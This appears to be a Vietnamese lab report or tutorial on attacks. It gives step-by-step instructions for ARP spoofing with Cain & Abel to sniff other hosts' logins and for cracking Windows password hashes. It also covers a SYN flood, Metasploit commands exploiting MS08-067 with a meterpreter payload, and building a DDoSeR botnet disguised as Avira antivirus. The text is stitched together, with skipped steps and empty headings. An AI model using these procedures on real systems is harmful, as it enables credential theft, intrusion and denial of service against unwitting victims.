Hướng dẫn sử dụng phần mềm cain

- Sniffer tab:Tại đây chúng ta chọn card mạng sử dụng để tiến hành sniffer và tính năng ARP,check vào ô Option để kích hoạt hay không kích hoạt tính năng... Qét các máy đang online trong

Phần I: Cain & Abel

I. Những vấn đề đã tìm hiểu

1. Giới thiệu phần mềm Cain & Abel

Là chương trình tìm mật khẩu chạy trên hệ điều hành Microsoft Nó cho phép dễdàng tìm ra nhiều loại mật khẩu bằng cách dò tìm trên mạng, phá các mật khẩu đã mã hóabằng các phương pháp Dictionary, Brute-Force and Cryptanalysis, ghi âm các cuộc đàmthoại qua đường VoIP, giải mã các mật khẩu đã được bảo vệ, tìm ra file nơi chứa mậtkhẩu, phát hiện mật khẩu có trong bộ đệm, và phân tích các giao thức định tuyến

Chương trình này không khai thác những lỗ hổng chưa được vá của bất kỳ phầnmềm nào Nó tập trung vào những khía cạnh/điểm yếu hiện có trong các chuẩn giao thức,các phương pháp đăng nhập và các kỹ thuật đệm Mục đích chính của công cụ này là tìm

ra mật khẩu và những thông tin cần thiết từ nhiều nguồn, tuy vậy, nó cũng sử dụng nhiềucông cụ "phi chuẩn" đối với người sử dụng Microsoft Windows

Địa chỉ download: http://www.oxid.it/cain.html

Phiên bản mới nhất: Cain & Abel v4.9.43 for Windows

2. Cài đặt Cain & Abel

- Yêu cầu về phần cứng và phần mềm:

+ Ổ cứng còn trống 10M+ Hệ điều hành: Microsoft Windows 2000/XP/2003/Vista+ Phải có Winpcap

3. Cấu hình Cain & Abel

Giao diện:

Cain & Abel muốn hoạt động được ta cần phải cấu hình một vài thông số trongbảng Configuration Dialog:

- Sniffer tab:

Tại đây chúng ta chọn card mạng sử dụng để tiến hành sniffer và tính năng ARP,check vào ô Option để kích hoạt hay không kích hoạt tính năng

- ARP tab

Đây là nơi để config ARP, mặc định Cain ngăn cách 1 chuỗi gửi gói ARP từ nạnnhân trong vòng 30s Đây là một điều cần thiết bởi vì việc xâm nhập vào các thiết bị cóthể sẽ gây ra sự không lưu thông tín hiệu Từ tab này ta có thể thiết lập thời gian giữa mỗilần thực thi ARP, thời gian ít sẽ tạo cho ARP lưu thông nhiều, ngược lại sẽ khó khăn hơntrong việc xâm nhập.

Tại mục này ta cần chú ý tới phần Spoofing Options:

+ Mục đầu tiên cho phép ta sử dụng địa chỉ MAC và IP thực của máymình đang sử dụng

+ Mục thứ hai cho phép sử dụng một IP và địa chỉ MAC giả mạo.(Lưu ý địa chỉ giả mạo phải không trùng với IP của máy khác)

- Filters and ports tab

Tab này sẽ cho chúng ta thấy một số thông tin về giao thức và số port tương ứngvới mỗi giao thức đó

Tại đây chúng ta có thể kích hoạt hay không kích hoạt các port ứng dụng giao thứcTCP/UDP

II. Kịch bản Demo các ứng dụng của Cain & Abel

1. Qét các máy đang online trong mạng cùng với địa chỉ IP và địa chỉ MAC

- Bước 1: Chạy chương trình Cain & Abel

- Bước 2: Vào configuration Dialog / Sniffer chọn card sử dụng

- Bước 3: Click vào 2 button Start/Stop Sniffer, APR

- Bước 4: Chọn tab Sniffer trên thanh công cụ, sau đó Right click -> ScanMAC Adddresses

- Bước 5: Click vào OK để scan với 2 tùy chọn:

+ All hosts in my subnet: scan toàn bộ dải mạng

+ Range: scan theo một dải nhất định

- Kết quả: Danh sách địa chỉ IP và địa chỉ MAC của các host đang onlinetrong mạng

2. Sử dụng Cain & Abel để hack mạng LAN

Làm các bước theo hình minh họa sau:

- Bước 1: Bật phần mềm cain & abel lên vào chọn Configure

- Bước 2: Trong tab sniffer chọn card mạng thích hợp

- Bước 3: Start sniffer

- Bước 4: Kích chọn sniffer

- Bước 5: Chọn Add to list hình dấu cộng màu xanh

- Bước 6: Kích chọn Ok, ở đây sẽ ra danh sách các địa chỉ IP mà chươngtrình Scan được

- Bước 7: Chọn tab arp

- Bước 8: Chọn Add to list hình dấu cộng màu xanh, sau đó chọn host cầnsniffer

- Bước 9: Start arp

- Bước 10: Kích chọn tab Passwords và quan sát kết quả thu được

- Phân tích kết quả quan sát tab Password, chọn HTTP

+ Dựa vào đây ta có thể biết được user, password của một tài khoản sửdụng giao thức http, imap, pop3, telnet

+ User, passwword đăng nhập yahoo và gmail cũng hiện ra ở đây+ Tóm lại ta có thể biết được mọi hoạt động của host đang giám sát

3. Sử dụng Cain & Abel để crack password đăng nhập Windows

Từ giao diện Cain & Abel chọn tab Cracker -> kích chọn Add to list ( hình dấu +màu xanh), giao diện như sau:

Trên Add NT Hashes from ta chọn Next chương trình sẽ hiện ra cho ta một danhsách những tài khoản đăng nhập Windows, ta chọn một tài khoản cần dò password

Có 2 phương pháp để crack password là: Dictionary Attack, Brute-Force Attack

Sử dụng Phương pháp Dictionary:

Ở đây ta chọn tài khoản cần crack password là Addministrator Kích chuột phảilên Administrator -> chọn Dictionary Attack -> chọn LM Hashes:

Bảng Dictionary Attack xuật hiện ta kích chuột phải chọn Add to list Insert

Tiếp theo chọn đường dẫn đến file từ điển password đã được xây dựng trước

Kết quả thu được password là: admin

Sử dụng phương pháp Brute-Force Attack:

Kích chuột phải lên tài khoản Administrator -> chọn Brute-Force Attack -> chọn

LM Hashes

Tiếp theo chọn Start, kết quả thu được password là: admin

Lưu ý: thời gian để crack một password tùy thuộc vào độ mạnh yếu của password

- Bước 1: chạy phần mềm cain & abel

- Bước 2: Trong menu Configure, chọn Card mạng tham gia capture

- Bước 3: Chọn Start Sniffer, Chọn Add Host -> OK để dò các máy trongcùng Switch

- Bước 5: chọn start ARP

- Bước 7: Trở về PC03, chọn tab "Password"

- Bước 8: Click phải chuột vào password vừa capture được, chọn "send to cracker"

- Bước 9: Sang tab cracker, click phải vào password cần crack chọn BruteForce attack / NTLM Session Security -> kích Start

- Bước 10: Quan sát kết quả thu được password: 123

5. Một số ứng dụng khác của Cain & Abel

a. Crack password file Access

- Bước 1: vào Tools -> chọn Access Database Password Decoder

- Bước 2: chỉ đường dẫn đến nơi chứa file Access

b. Hash calculator

- Bước 1: vào Tools -> chọn Hash Calculator

- Bước 2: điền ký tự cần hash sau đó kích chọn Calculate

c. Remote Registry

5 Định nghĩa về tấn công DDoS

6 Phân loại tấn công DDoS

7 Các tools tấn công DDoS

8 Phòng ngừa tấn công từ chối dịch vụ DoS & DDoS

9 Dùng Nmap, Backtrack để quét và khai thác lỗ hổng Windows

II. Kịch bản Demo

1. Tấn công DoS

- Bước 2: Điền địa chỉ IP hoặc địa chỉ của máy cần tấn công -> kích chọnStart

- Bước 3: Dùng Wireshark để kiểm tra kết quả

- Quan sát trên Wireshark ta thấy Attacker gửi các yêu cầu (request ảo) TCPSYN tới máy chủ bị tấn công Để xử lý lượng gói tin SYN này hệ thống cầntốn một lượng bộ nhớ cho kết nối, khi có rất nhiều gói SYN ảo tới máy chủthì nó sẽ chiếm hết các yêu cầu xử lý của máy chủ Hậu quả là máy chủ bịtreo hoặc reset

- Trước khi bị Attacker tấn công: CPU luôn ổn định vào hoạt động ít

2. Dùng Nmap và Backtrack khai thác lỗ hổng của Windows

- Bước 1: Dùng Nmap để quét lỗ hổng trên máy nạn nhân

- Bước 2: Dùng Backtrack để khai thác lỗ hổng MS08-067

+ root@bt:~# msfconsole+ msf > use exploit/windows/smb/ms08_067_netapi+ msf exploit(ms08_067_netapi) > set RHOST 192.168.18.245+ msf exploit(ms08_067_netapi) > set PAYLOAD

windows/meterpreter/bind_tcp+ msf exploit(ms08_067_netapi) > exploit+ meterpreter > execute -f cmd –c

- Bước 1: Khởi động chương trình DdoSeR

- Bước 2: Build server bằng cách vào Menu chọn Server Builder

Sau đó chúng ta phải điền các thông số sau:

+ DNS: Địa chỉ DNS của Server dùng để điều khiển các máy client+ Port: Đây là port dùng để giao tiếp giữa server và client ( ta có thểchọn một port bất kỳ)

+ ID: Chọn môt ID bất kỳ+ Reg Key: Default + Startup EXE: Tên này sẽ được hiển thị trong Task Manager khichạy chương trình vì vậy ta sẽ đặt tên là avira để đánh lừa victimnhư một phần mềm virus avira đang chạy bình thường chánh bị pháthiện

Cuối cùng kích chọn Build để build server, nhận được thông báo như sau là thànhcông:

- Bước 3: Xây dựng các Zombie

Sau khi đã build được server chúng ta copy chương trình đó lên máy nạn nhân vàchạy chương trình

- Bước 4: Sau khi đã xây dựng được các Zombie tiến hành kết nối cácZombie này với Server bằng cách:

+ Trên server chạy chương trình DdoSeR, kích chuột phải chọn Listen

+ Sau đó điền port để giao tiếp với các Zombie (ở đây chúng ta đã cấuhình port dùng để giao tiếp là 123)

+ Sau khi điền port dùng để giao tiếp kích chọn OK chương trình sẽhiện ra danh sách các Zombie

- Bước 5: Tiến hành tấn công DDoS bằng cách điền các thông tin sau

+ Victim: địa chỉ IP của victim

Sau đó ta kích chọn Start Flood để tiến hành tấn công, chọn Stop Flood để dừng.

Dùng Wireshark để kiểm tra kết quả thấy trên máy victim có rất nhiều giao thứcUDP được gửi đến